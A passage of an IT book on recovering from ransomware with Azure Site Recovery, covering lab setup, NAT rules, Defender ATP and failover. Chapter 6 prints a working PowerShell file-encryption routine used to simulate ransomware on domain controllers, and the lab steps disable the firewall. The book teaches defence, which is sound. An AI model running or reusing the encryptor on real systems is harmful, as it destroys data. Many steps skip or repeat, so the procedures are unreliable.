By Microsoft MVP’s:
Dave Kawula Cristal Kawula
Emile Cabot Cary Sun
John O’Neill Sr - rMVP
PUBLISHED BY
MVPDays Publishing
http://www.mvpdays.com
All rights reserved. No part of this book may be reproduced or transmitted in any form or by any
means without the prior written permission of the publisher.
ISBN: TBD
Feedback Information
We’d like to hear from you! If you have any comments about how we could improve the quality
of this book, please don’t hesitate to contact us by visiting www.checkyourlogs.net or sending an
email to dave@mvpdays.com.
Acknowledgments
From Dave
Cristal, you are my rock and my source of inspiration. For the past 20+ years you have been there with me every step of the way. Not only are you the "BEST Wife" in the world, you are my partner in crime. Christian, Trinity, Keira, Serena, Mickaila, Mackenzie, and Rycker, you kids are so patient with your dear old dad when he locks himself away in the office for yet another book. Taking the time to watch you grow in life and sports, and become little leaders of this new world, is incredible.
Thank you, Mom and Dad (Frank and Audry) and my brother Joe. You got me started in this crazy IT world when I was so young. Brother, you mentored me along the way, both coaching me in hockey and helping me learn what you knew about PCs and servers. I'll never forget us as teenage kids working the IT support contract for the local municipal government. Remember, Dad had to drive us to site because you weren't old enough to drive us yourself yet. A great career starts with the support of your family, and I'm so lucky because I have all the support one could ever want.
Last but not least, the MVPDays volunteers: you have donated your time and expertise and helped us run the event in over 20 cities across North America. Our latest journey has us expanding the conference worldwide as a virtual conference. For those of you that will read this book, your potential is limitless; just expand your horizons, and you never know where life will take you.
About the Authors
Dave is well-known in the community as an evangelist for Microsoft, 1E, and Veeam technologies. Locating Dave is easy, as he speaks at several conferences and sessions each year, including TechEd, Ignite, the MVPDays Community Roadshow, and VeeamOn.
Recently Dave has been honored to take on the role of Conference Co-Chair of TechMentor with fellow MVP Sami Laiho. The lineup of speakers and attendees that have been to this conference over the past 20 years is fantastic. Come down to Redmond or Orlando in 2018, and you can meet him in person. Check out his speaking site at www.davekawula.com.
He recently tied for 1st place out of 1800 speakers at the Microsoft Ignite Conference in Orlando.
As the founder and Managing Principal Consultant at TriCon Elite Consulting, Dave is a leading technology expert for both local customers and large international enterprises, providing optimal guidance and methodologies to achieve and maintain an efficient infrastructure.
BLOG: www.checkyourlogs.net
Twitter: @DaveKawula
Cristal can be found speaking at Microsoft Ignite, MVPDays, and other local user groups. She is extremely active in the community and has recently helped publish a book for other women MVPs called Voices from the Data Platform.
This year at Microsoft Ignite she led community meetups for various topics such as Women in IT, Parenting in IT, Diversity in Tech, and Becoming a Community Rockstar.
BLOG: http://www.checkyourlogs.net
Twitter: @supercristal1
Emile actively volunteers as a member of the Canadian Ski Patrol, providing over 250 hours each year of first aid services and public education at Castle Mountain Resort and in the community.
BLOG: http://www.checkyourlogs.net
Twitter: @ecabot
Cary Sun is a Cisco Certified Internetwork Expert (CCIE No. 4531) and holds MCSE, MCITP, and Citrix CCA certifications, with over twenty years in the planning, design, and implementation of network technologies, management, and system integration. His background includes hands-on experience with multi-platform environments, all LAN/WAN topologies, network administration, e-mail and Internet systems, security products, and PC and server environments. His expertise is analyzing users' needs and coordinating system designs from concept through implementation. He has exceptional analysis, organization, communication, and interpersonal skills, and a demonstrated ability to work independently or as an integral part of a team to achieve objectives and goals. Specialties: CCIE / CCNA / MCSE / MCITP / MCTS / MCSA / Solution Expert / CCA
Cary is a very active blogger at checkyourlogs.net and always available online for questions from the community. His passion for technology is contagious, and he makes everyone around him better at what they do.
Blog: http://www.checkyourlogs.net
Twitter: @SifuSun
Contents
Contents ix
Introduction 14
Chapter 1 17
Chapter 2 24
Chapter 3 88
Chapter 4 95
Reset Settings for your Azure Site Recovery Hyper-V Host 157
Enable Diagnostic Logging for Azure Site Recovery 162
Zero Day time to Failover 163
Assuming an Admin Level breach Failing over 100% to Azure 163
Executing a PowerShell based Ransomware Attack on Domain Controllers 163
Encrypting the Sysvol Folder 165
Taking Down Production Killing Domain Controllers with Ransomware 171
Encrypting the Active Directory Database 171
Survival Mode Recovering to Azure 178
Tick Tock time to make a decision – We are Recovering to Azure 179
Performing the Double Swing Recovery 180
Join us at MVPDays and meet great MVP's like this in person 189
Live Presentations 189
Video Training 189
Live Instructor-led Classes 190
Consulting Services 190
Introduction
MVPDays Online
The purpose of this book is to showcase the fantastic expertise of our guest speakers at MVPDays Online. They have so much passion, expertise, and expert knowledge that it only seemed fitting to write it down in a book.
MVPDays was founded by Cristal and Dave Kawula back in 2013. It started as a simple idea: "There's got to be a good way for Microsoft MVPs to reach the IT community and share their vast knowledge and experience in a fun and engaging way." I mean, what is the point in recognizing these bright and inspiring individuals and not leveraging them to inspire the community that they are a part of?
Anyone that has an interest in technology is eager to learn and wants to meet other like-minded individuals. This Roadshow is not just for Microsoft MVPs; it is for anyone in the IT community.
Make sure you check out the MVPDays website at www.mvpdays.com. You never know; maybe the roadshow will be coming to a city near you.
The goal of this particular book is to show you how to survive a ransomware attack using Azure Site Recovery. Each chapter is broken down into a unique tip, and we hope you find some immense value in what we have written.
Sample Files
All sample files for this book can be downloaded from www.checkyourlogs.net and
https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery
Additional Resources
In addition to all the tips and tricks provided in this book, you can find extra resources like
articles and video recordings on our blog http://www.checkyourlogs.net
Chapter 1 Setting up your Azure Subscription from Scratch
If you are a newcomer to Microsoft Azure, no worries; I am going to show you how to create an Azure free account with $200 credit today. Follow the steps below.
3. If you already have an account with Microsoft (e.g., Office 365, outlook.com, ...), enter your email address and then click Next. If you don't have a Microsoft account, click Create one.
4. If your email address is used with more than one account from Microsoft, you need to select which account you want to use.
6. On the About you page, enter your personal information and then click Next.
7. On the Identity verification by card page, enter your credit card information and then click Next. Don't worry, Microsoft won't charge you until you upgrade your free
8. On the Agreement page, select I agree to the subscription agreement, offer details, and privacy statement and I would like information, tips, and offers from Microsoft or selected partners about Azure, including Azure Newsletter, Pricing updates, and other
9. Congratulations! You're ready to start with Azure and get $250 credit for free. Click Go to the portal and enjoy the Azure features there.
10. That's it; you have now successfully set up your first Azure tenant and have access to the Azure Portal.
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
3. On the Create a virtual machine page, click Basics and select the Azure subscription that will pay for this virtual machine.
4. Select Create new under Resource group and enter a resource group name. I recommend using your virtual machine name, because it will be easy to maintain your
5. Virtual machine name: enter the virtual machine name (the same as your resource group name).
Region: select the region for the virtual machine. In my case, I am using West US 2.
Availability options: keep the default setting.
Image: select Windows Server 2016 Datacenter.
Size: click Change size and select one of the Dv3 or Ev3 VM sizes, because we need to enable nested virtualization.
Username: enter the login user name.
Password: enter the login password.
7. On the Create a new disk page, use the following settings and then click OK.
Disk type: Premium SSD
Name: keep the default name
Size (GiB): 4095
Source type: None
Virtual network: select your vnet if you have an existing one; if not, keep the default settings.
Subnet: select the subnet name if you have an existing subnet; if not, keep the default settings.
Public IP: click Create new
Accelerated networking: On
10. On the Create a virtual machine page, click Management and keep the default settings.
11. On the Create a virtual machine page, click Guest config and keep the settings as default.
12. On the Create a virtual machine page, click Tags and keep the settings as default.
13. On the Create a virtual machine page, click Review + create and make sure Validation
passed and then click Create.
7. Change the assignment setting from Dynamic to Static, and then click Save.
9. On the Add IP configuration page, use the following settings and then click OK.
Name: ipconfig2
IP address: 10.10.1.9
SKU: Basic
12. Repeat the Add IP configuration steps if you need more public IP addresses.
2. Open Disk Management to partition and format your new 4 TB storage space (use ReFS with a 64 KB block size).
5. On the Select installation type page, select Role-based or feature-based installation and then click Next.
7. On the Select server roles page, select Hyper-V, click Add Features and then click Next.
10. On the Create Virtual Switches page, don’t select any interface and click Next.
12. On the Default Stores page, you can change the default location to your new 4 TB storage space, and then click Next.
13. On the Confirm installation selections page, select Restart the destination server automatically if required and then click Install.
To configure NAT networking, we need to create an internal virtual switch for the nested guest VMs. In general, there are two options for networking with nested virtual machines: MAC address spoofing and NAT networking. Unfortunately, MAC address spoofing is not possible in a public cloud environment. So, if you are using an Azure virtual machine network interface as your Hyper-V external virtual switch and have assigned it to nested guest VMs, the guest VMs won't be able to access the Internet. At this point, we have no choice but to use NAT networking.
The steps below show how to configure a NetNat virtual switch with a single public IP address.
1. We can create an internal virtual switch and create NAT rules via PowerShell cmdlets as follows:
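The cmdlets themselves were captured in a screenshot, so here is an added PowerShell example (not the book's own script) that creates the internal switch and NetNat the way this step describes. It assumes the switch name NAT Network Switch and the 192.168.100.0/24 guest range used later in this chapter, with 192.168.100.1 as the host-side gateway address and NestedLabNAT as an assumed name for the NAT object.

```powershell
# Added example (not the book's script): internal Hyper-V switch plus a Windows NetNat
# for the nested guests. Names and the 192.168.100.0/24 range follow this chapter's lab.
#Requires -RunAsAdministrator
$SwitchName = 'NAT Network Switch'
$GatewayIP  = '192.168.100.1'      # host-side address, used as the guests' default gateway
$PrefixLen  = 24
$NatName    = 'NestedLabNAT'       # assumed name for the NetNat object
$NatPrefix  = '192.168.100.0/24'

# 1. Internal switch: the host gets a vEthernet adapter on it; the nested guests attach to it.
if (-not (Get-VMSwitch -Name $SwitchName -ErrorAction SilentlyContinue)) {
    New-VMSwitch -Name $SwitchName -SwitchType Internal | Out-Null
}

# 2. Gateway address on the host's vEthernet adapter for that switch.
$adapter = Get-NetAdapter -Name "vEthernet ($SwitchName)"
$hasIp = Get-NetIPAddress -InterfaceIndex $adapter.ifIndex -AddressFamily IPv4 -ErrorAction SilentlyContinue |
         Where-Object { $_.IPAddress -eq $GatewayIP }
if (-not $hasIp) {
    New-NetIPAddress -InterfaceIndex $adapter.ifIndex -IPAddress $GatewayIP -PrefixLength $PrefixLen | Out-Null
}

# 3. NetNat for the guest range. New-NetNat fails if a NAT for this prefix already exists,
#    so check first and the script can be re-run safely.
$existing = Get-NetNat -ErrorAction SilentlyContinue |
            Where-Object { $_.InternalIPInterfaceAddressPrefix -eq $NatPrefix }
if (-not $existing) {
    New-NetNat -Name $NatName -InternalIPInterfaceAddressPrefix $NatPrefix | Out-Null
}

# 4. Show what is in place, to compare with the guest's gateway and subnet settings.
Get-NetNat | Select-Object Name, InternalIPInterfaceAddressPrefix, Active
Get-NetIPAddress -InterfaceIndex $adapter.ifIndex -AddressFamily IPv4 |
    Select-Object IPAddress, PrefixLength
```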
These steps allow us to add as many external public IP addresses in Azure as we need and NAT them into our lab virtual machines. This gives you the most realistic lab experience possible.
2. Open a Command Prompt, run ipconfig /all, and then write down the DNS IP address.
3. Add all of the IP addresses to the Azure virtual machine network interface; in my case they are 10.10.1.8-10.
4. Re-run ipconfig /all, and you will now see all of the IP addresses under the network interface.
7. Change switch name to NAT Network Switch and then click OK.
To configure Port Forwarding (NAT) into our lab we will use the Built-In Routing and Remote
Access role in Windows. The steps below will walk you through the configuration required.
14. Right-click the server name and select Configure and Enable Routing and Remote Access.
16. On the Configuration page, select Network address translation (NAT), click Next.
17. On the NAT Internet Connection page, select Ethernet 2 as the public interface and click Next.
18. On the Name and Address Translation Services page, select Enable basic name and
address services, click Next.
4. Enter the IP addresses and mask and click OK. These are the addresses that were created with public IP addresses in the Azure portal.
6. Use the following settings for TCP port 443 port forwarding and then click OK.
Description of Services: TCP443-10.10.1.10
On this address pool entry: 10.10.1.10
Protocol: TCP
Incoming port: 443
Private IP address: 192.168.100.99
8. Repeat these steps to create rules for port 80 and port 3389 as well.
2. On the Server Manager page, select Local Server and then click the Windows Firewall entry (showing Public: On, Private: On).
4. On the Customize Settings page, select Turn off Windows Firewall for both the private network and the public network, and then click OK.
3. On the Virtual machines page, select the Virtual machine which you are using as Hyper-V
host.
6. On the Add inbound security rule page, change Destination port ranges to 443, Protocol to TCP, and Name to Port_443, and then click Add.
1. Create a guest virtual machine on the nested Azure host (VM). Make sure the network adapter is configured to use the NAT Network Switch, and assign the IP address 192.168.100.99/24 with default gateway 192.168.100.1; you can use 8.8.8.8 as the DNS server.
2. Enable Remote Desktop to test RDP (TCP port 3389) and turn off the Windows Firewall.
3. Install the IIS features on this machine. If you would like to test SSL (port 443), set up and configure an SSL certificate in IIS.
5. If you can connect successfully, your NAT rules are working through the Azure NSG and also through the RRAS configuration on the nested host in Azure.
6. Next, test port 80 from the Internet via GDMCALABHV1-PublicIP3; it will show you the default IIS website. This also validates that the port forwarding is working.
7. Last, you can validate the NAT session mapping on the Azure nested host (VM) using the Routing and Remote Access tool.
In the steps below we will show you how to bulk configure rules using PowerShell.
$HostInterfaceName = "Ethernet 4"
$Protocol = "TCP"
$PublicIP = "10.10.1.101"
$PrivateIP = "192.168.100.101"
# One RRAS port mapping per port, with the same port number on the public and private side
for ($Port = 1000; $Port -le 1010; $Port++) {
    netsh routing ip nat add portmapping name=$HostInterfaceName proto=$Protocol publicip=$PublicIP publicport=$Port privateip=$PrivateIP privateport=$Port
}
This will create a Custom Service (NAT rule) in Routing and Remote Access on interface Ethernet 4, TCP, ports 1000-1010.
You can also run netsh routing dump to see the output.
Overall, this is an easy way to automate the creation of the NAT Rules for your lab.
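Generalizing the loop above, the following is an added example (not the book's script) that builds every mapping this chapter uses, the 443, 80 and 3389 rules on 10.10.1.10 and the 1000-1010 range on 10.10.1.101, from one table, reports each netsh call that fails, and verifies the result from netsh routing dump; the interface name Ethernet 4 is taken from the text above.

```powershell
# Added example (not the book's script): bulk RRAS NAT port mappings from one table.
# Values are this chapter's lab addresses; change them to match your own interface and IPs.
#Requires -RunAsAdministrator

# One row per public IP / port set / private IP. A range expands to one rule per port, which
# is how RRAS stores them: netsh routing ip nat has no range object.
$Mappings = @(
    @{ Interface = 'Ethernet 4'; Proto = 'TCP'; PublicIP = '10.10.1.10';  Ports = 443;        PrivateIP = '192.168.100.99' }
    @{ Interface = 'Ethernet 4'; Proto = 'TCP'; PublicIP = '10.10.1.10';  Ports = 80;         PrivateIP = '192.168.100.99' }
    @{ Interface = 'Ethernet 4'; Proto = 'TCP'; PublicIP = '10.10.1.10';  Ports = 3389;       PrivateIP = '192.168.100.99' }
    @{ Interface = 'Ethernet 4'; Proto = 'TCP'; PublicIP = '10.10.1.101'; Ports = 1000..1010; PrivateIP = '192.168.100.101' }
)

function Add-RrasPortMapping {
    param(
        [Parameter(Mandatory)][string]$Interface,
        [Parameter(Mandatory)][ValidateSet('TCP', 'UDP')][string]$Proto,
        [Parameter(Mandatory)][ipaddress]$PublicIP,
        [Parameter(Mandatory)][ValidateRange(1, 65535)][int]$Port,
        [Parameter(Mandatory)][ipaddress]$PrivateIP
    )
    # Same port on both sides, as in the loop above. netsh reports an error (non-zero exit
    # code) when the interface is not a NAT public interface or the mapping already exists.
    $out = netsh routing ip nat add portmapping name="$Interface" proto=$Proto `
        publicip=$PublicIP publicport=$Port privateip=$PrivateIP privateport=$Port 2>&1
    if ($LASTEXITCODE -ne 0) {
        Write-Warning "$Proto $PublicIP`:$Port -> $PrivateIP`:$Port failed: $($out -join ' ')"
        return $false
    }
    return $true
}

$added = 0; $failed = 0
foreach ($m in $Mappings) {
    foreach ($p in @($m.Ports)) {
        $ok = Add-RrasPortMapping -Interface $m.Interface -Proto $m.Proto `
            -PublicIP $m.PublicIP -Port $p -PrivateIP $m.PrivateIP
        if ($ok) { $added++ } else { $failed++ }
    }
}
Write-Host "Port mappings added: $added, failed: $failed"

# Verify against the configuration RRAS actually holds, filtered to the port mappings.
netsh routing dump | Select-String -Pattern 'add portmapping'
```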
Chapter 3 Using BigDemo to Build your Lab
2. Open an administrative PowerShell prompt and type:
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery/master/BigDemo_ASR_WAC.ps1" -OutFile "C:\Post-Install\BigDemo_ASR_WAC.PS1"
5. Copy BigDemo_Insider.PS1 from C:\Post-Install to F:\DCBuild_Insider.
6. Open BigDemo_Insider.PS1 with the PowerShell ISE and edit lines 425 and 434, putting in your product key received with the EVAL version of Windows Server 2016 downloaded above.
7. Save BigDemo_Insider.PS1.
8. Open an administrative PowerShell prompt. Run BigDemo_Insider.PS1 with the following parameters:
WorkingDir: f:\DCBuild_Insider
Organization: MVPDays Rockstars
TimeZone: Mountain Standard Time
AdminPassword: P@ssw0rd
DomainName: MVPDays.com
DomainAdminPassword: P@ssw0rd
VirtualSwitchName: MVPDays_VMM_VSwitch
Subnet: 172.16.100.
ExtraLabFiles: C:\
9. It will take approximately 1 hour to build the lab environment.
With BigDemo you can create a new Lab Environment on demand. This script has built out
Active Directory, DHCP, DNS, and the other core infrastructure components required to get
started with your lab.
Chapter 4 Configuring Windows Admin Center
Function Install-WindowsAdminCenter {
    param
    (
        [string]$VMName,
        [string]$GuestOSName,
        [string]$VMPath,
        [string]$WorkingDir
    )
    # function body not reproduced in this excerpt
}
1. Logon to Management01 as Administrator
1. Logon to Management01 as Administrator
6. Click on Management01
1. Logon to Management01 as Administrator
1. Logon to Management01 as Administrator
5. Click on Management01
1. Logon to Management01 as Administrator
1. Logon to Management01 as Administrator
5. Click on Management01
1. Logon to Management01 as Administrator
5. Click on drtitan01
Chapter 5 Windows Defender Advanced Threat Protection (ATP)
Windows Defender Advanced Threat Protection (ATP) is an extremely useful add-on to help protect your Windows Servers. This tool builds on the Windows Defender capabilities included with Windows Server 2019.
In this chapter, we will give a brief overview of some of the features. To start things off, you will need to sign up for a trial here: https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp?ocid=docs-wdatp-portaloverview-abovefoldlink
1. Browse to https://securitycenter.windows.com/dashboard
2. Log in with your Admin credentials
6. Download the deployment package to the target server Management01
7. Open an administrative Command Prompt and run WindowsDefenderATPLocalOnboardingScript.cmd
8. Wait approximately 5 minutes and check the Machines list in the portal
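Rather than waiting for the portal, the sensor state can be checked on the server itself. The following is an added example (not from the book) that reads the Sense service state and the onboarding registry values the onboarding script writes, and lists recent sensor events; the service name, registry path and log name are the ones the ATP sensor uses.

```powershell
# Added example (not from the book): verify the Windows Defender ATP onboarding locally
# on Management01. Service name, registry path and log name are those used by the ATP sensor.
$StatusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'

function Test-AtpOnboarding {
    $result = [ordered]@{
        SenseService    = 'not installed'
        OnboardingState = $null
        OrgId           = $null
        Onboarded       = $false
    }
    # The sensor runs as the "Sense" service; it stays stopped until onboarding succeeds.
    $svc = Get-Service -Name Sense -ErrorAction SilentlyContinue
    if ($svc) { $result.SenseService = $svc.Status.ToString() }

    # The onboarding script writes OnboardingState = 1 and the tenant's OrgId here.
    $status = Get-ItemProperty -Path $StatusKey -ErrorAction SilentlyContinue
    if ($status) {
        $result.OnboardingState = $status.OnboardingState
        $result.OrgId           = $status.OrgId
    }
    $result.Onboarded = ($result.SenseService -eq 'Running' -and $result.OnboardingState -eq 1)
    [pscustomobject]$result
}

$check = Test-AtpOnboarding
$check | Format-List
if (-not $check.Onboarded) {
    Write-Warning 'Sensor not onboarded yet: re-run the onboarding .cmd from an administrative prompt and review the sensor log below.'
}

# Recent sensor events; errors here explain a stalled onboarding (e.g. no outbound connectivity).
Get-WinEvent -LogName 'Microsoft-Windows-SENSE/Operational' -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, LevelDisplayName, Message | Format-Table -Wrap
```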
1. Browse to https://securitycenter.windows.com/dashboard
2. Log in with your Admin credentials
Chapter 6 Simulating a Ransomware Attack
RanSim will simulate 13 ransomware infection scenarios and 1 crypto mining infection scenario
and show you if a workstation is vulnerable.
8. On the KnowBe4 Ransomware Simulator window, click Launch
A new feature with Windows Server 2019 is Ransomware Protection. In the following steps, we will re-run the tests with the RanSim ransomware simulator and see the output.
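As an added example (not the book's own steps), this PowerShell turns the Ransomware Protection feature (controlled folder access) on in audit mode, protects a folder, and pulls the events it raises, so the RanSim re-run can be compared before and after enforcement. The folder path C:\LabData is a placeholder constructed for this example.

```powershell
# Added example (not from the book): Windows Defender "Ransomware Protection"
# (controlled folder access) for the lab. C:\LabData is a placeholder; point it at the
# folder the simulator will write to.
#Requires -RunAsAdministrator
$ProtectedFolder = 'C:\LabData'

# Audit mode records what would have been blocked (event 1124) without stopping anything,
# so legitimate tools can be allowed first; Enabled blocks and raises event 1123 instead.
Set-MpPreference -EnableControlledFolderAccess AuditMode
if ((Get-MpPreference).ControlledFolderAccessProtectedFolders -notcontains $ProtectedFolder) {
    Add-MpPreference -ControlledFolderAccessProtectedFolders $ProtectedFolder
}

function Get-CfaState {
    $pref = Get-MpPreference
    $mode = switch ([int]$pref.EnableControlledFolderAccess) {
        0 { 'Disabled' } 1 { 'Enabled' } 2 { 'AuditMode' } default { "Other($_)" }
    }
    [pscustomobject]@{
        Mode    = $mode
        Folders = @($pref.ControlledFolderAccessProtectedFolders)
        Allowed = @($pref.ControlledFolderAccessAllowedApplications)
    }
}

# Controlled folder access events live in the Defender operational log:
# 1123 = write blocked, 1124 = write audited. The first message line names the process and path.
function Get-CfaEvents([int]$Hours = 1) {
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1123, 1124
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $outcome = if ($_.Id -eq 1123) { 'Blocked' } else { 'Audited' }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Outcome = $outcome
            Detail  = ($_.Message -split "`r?`n")[0]
        }
    }
}

Get-CfaState | Format-List
# Re-run RanSim at this point, then review what the feature saw:
Get-CfaEvents | Format-Table -AutoSize

# Once only the simulator shows up in the audit, enforce it:
# Set-MpPreference -EnableControlledFolderAccess Enabled
```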
The code below is only to be used for testing purposes. DO Not run this in a production
environment. None of the authors of this book take any responsibility for your actions.
Windows Defender will not pick this attack up because it was executed with Administrative
Credentials. This means that in this case, you are now the victim of a Ransomware Attack.
#global variables
$csv = "C:\windows\temp\drives.csv"

Function Encrypt-File
{
    Param(
        [Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
        [Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert
    )
    Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography") }
    Catch { Write-Error "Could not load required assembly."; Return }

    # Per-file AES-256-CBC key and IV; the key is wrapped with the certificate's RSA public key
    $AesProvider = New-Object System.Security.Cryptography.AesManaged
    $AesProvider.KeySize = 256
    $AesProvider.BlockSize = 128
    $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
    [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())

    # Output file layout: 4-byte key length, 4-byte IV length, wrapped key, IV, then ciphertext
    [Byte[]]$LenKey = $Null
    [Byte[]]$LenIV = $Null
    [Int]$LKey = $KeyEncrypted.Length
    $LenKey = [System.BitConverter]::GetBytes($LKey)
    [Int]$LIV = $AesProvider.IV.Length
    $LenIV = [System.BitConverter]::GetBytes($LIV)
    Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) }
    Catch { Write-Error "Unable to open output file for writing."; Return }
    $FileStreamWriter.Write($LenKey, 0, 4)
    $FileStreamWriter.Write($LenIV, 0, 4)
    $FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
    $FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
    $Transform = $AesProvider.CreateEncryptor()
    $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
    [Int]$Count = 0
    [Int]$Offset = 0
    [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
    [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
    [Int]$BytesRead = 0
    Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) }
    Catch { Write-Error "Unable to open input file for reading."; Return }
    Do
    {
        $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
        $Offset += $Count
        $CryptoStream.Write($Data, 0, $Count)
        $BytesRead += $BlockSizeBytes
    }
    While ($Count -gt 0)
    $CryptoStream.FlushFinalBlock()
    $CryptoStream.Close()
    $FileStreamReader.Close()
    $FileStreamWriter.Close()
    # Replace the original file with the encrypted copy written to the temp location
    copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force
}
Exit
8. Then grab the files from the folder:
$FilesToEncrypt = Get-ChildItem -Recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % { $_.FullName } -ErrorAction SilentlyContinue
$FilesToEncrypt
151
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Chapter 7
So what is an air-gapped backup anyway? Here is what Wikipedia has to say:
An air gap, air wall or air gapping is a network security measure employed on one or more
computers to ensure that a secure computer network is physically isolated from unsecured
networks, such as the public Internet or an unsecured local area network. It means a computer or
network has no network interfaces connected to other networks, with a physical or conceptual air
gap, analogous to the air gap used in plumbing to maintain water quality.
In layman's terms, it means that you must keep a copy of your backups and replicas offline.
2. Then, once replication completes, it turns off the source Virtual Machine.
3. At this point, it takes one final sync to capture the remaining changes. This can only be done
once the Virtual Machine is off. Think of a SQL Server or Exchange Server that was processing
transactions during the first sync: the system cannot guarantee that all of the records are there
until the Virtual Machine is off. That is why it shuts down the source machine to complete
the final delta sync.
4. Once the sync is completed, the Virtual Machine is powered on in your Microsoft Azure
tenant.
Why will this not work in a Ransomware situation? Because if the source machine was infected
and the files were encrypted, you have just taken the encrypted files up to Azure and turned on the
Virtual Machine.
1. The steps to perform Failover Now are easier and faster than a planned failover. First, you
choose the Virtual Machine from the Azure Recovery Vault.
4. Turn on the VM.
The total amount of time to turn on an air-gapped replica virtual machine is minutes.
Site Recovery jobs are still bringing the non-viable recovery points into your vault. If you outrun
the number of restore points and all you have is infected or encrypted files, then Azure Site
Recovery was pointless.
Earlier in the book, we showed you what an admin-level ransomware attack looked like for core
infrastructure roles like Domain Controllers. What this means for you is that you must keep
tight control and maintain the “Air Gap” between your on-prem infrastructure and the cloud.
Once you have safely recovered to a previous recovery point and cleaned up the on-prem side,
you will be able to set up a Site-to-Site VPN to give users access.
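The danger described above is that replication keeps running after the infection and the clean recovery points age out before anyone notices. The following script is an added example, not code from the book or from Microsoft: it reports, for every protected item in a Site Recovery vault, how many recovery points exist and how far back the oldest one reaches, so you know how many hours of pre-infection history you still have. It assumes the Az.RecoveryServices module, an existing Connect-AzAccount session, and that the recovery-point objects expose a RecoveryPointTime property; the vault name, resource group and threshold are placeholders for your environment.

```powershell
# Added example (not from the book): audit how much recovery-point history an ASR vault holds.
# Assumes Az.RecoveryServices is installed and Connect-AzAccount has already been run.
param(
    [string]$VaultName       = "MyRecoveryVault",   # placeholder: your Recovery Services vault
    [string]$ResourceGroup   = "MyResourceGroup",   # placeholder: the vault's resource group
    [int]   $MinHistoryHours = 72                   # warn when the oldest point is younger than this
)

Import-Module Az.RecoveryServices -ErrorAction Stop

$vault = Get-AzRecoveryServicesVault -Name $VaultName -ResourceGroupName $ResourceGroup
Set-AzRecoveryServicesAsrVaultContext -Vault $vault | Out-Null

$nowUtc = (Get-Date).ToUniversalTime()

$report = foreach ($fabric in Get-AzRecoveryServicesAsrFabric) {
    foreach ($container in Get-AzRecoveryServicesAsrProtectionContainer -Fabric $fabric) {
        foreach ($item in Get-AzRecoveryServicesAsrReplicationProtectedItem -ProtectionContainer $container) {

            # RecoveryPointTime is assumed to be the UTC timestamp of each point (assumption).
            $points = @(Get-AzRecoveryServicesAsrRecoveryPoint -ReplicationProtectedItem $item |
                        Sort-Object RecoveryPointTime)

            if ($points.Count -eq 0) {
                [pscustomobject]@{ Item = $item.FriendlyName; RecoveryPoints = 0
                                   OldestPointUtc = $null; NewestPointUtc = $null
                                   HistoryHours = 0; Status = 'NO RECOVERY POINTS' }
                continue
            }

            $oldest  = $points[0].RecoveryPointTime
            $newest  = $points[-1].RecoveryPointTime
            $history = [math]::Round(($nowUtc - $oldest).TotalHours, 1)

            [pscustomobject]@{
                Item           = $item.FriendlyName
                RecoveryPoints = $points.Count
                OldestPointUtc = $oldest
                NewestPointUtc = $newest
                HistoryHours   = $history
                # Less history than the threshold means an undetected infection older than that
                # has already overwritten every clean point: exactly the "outrun" case.
                Status         = if ($history -lt $MinHistoryHours) { 'WARN: short history' } else { 'ok' }
            }
        }
    }
}

$report | Sort-Object HistoryHours | Format-Table -AutoSize
```

Run it from an administrative workstation on a schedule and keep the output with the quarterly recovery-point test results; an item whose oldest point is only a few hours old is one where the "air gap" has effectively been lost, because a machine infected yesterday would already have replicated its encrypted disks into every remaining point.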
Dear CEO,
I think it is time that we notify the public of the breach that occurred on 04/13/2019.
None of our services will be viable for the foreseeable future. You should look at issuing a
public statement and having our teams contact our business partners. That million-dollar
shipment of supplies will not be arriving on time. Blah Blah
If you think that this situation doesn't happen, you are dead wrong. If you ask a room of IT
Professionals how many have been impacted by some type of Ransomware attack in the past 3
years, most of them would put their hands up.
So, the short answer to the question “When can I get my data back?” is: as soon as we can.
Trust me on this one point, my friends: if the choice is between nothing and a recovery
point that is 24 or 48 hours old, the business will be extremely thankful that they have
something to keep going.
The painstaking process of rekeying data after a Ransomware Attack is something that you won't
be able to overcome for core services such as:
a. Active Directory
b. DNS
c. DHCP
You are talking about weeks if not months of downtime for some of these services if not all of
them.
should be testing their Recovery Points quarterly. This is safe to do in an offline environment
and doesn't take that long to complete.
To resolve the issue, I had to run a reset script on the host to wipe all the settings.
pushd .
try
{
    # Refuse to run unless the session is elevated: the script removes registry keys.
    $windowsIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = new-object System.Security.Principal.WindowsPrincipal($windowsIdentity)
    $administrators = [System.Security.Principal.WindowsBuiltInRole]::Administrator
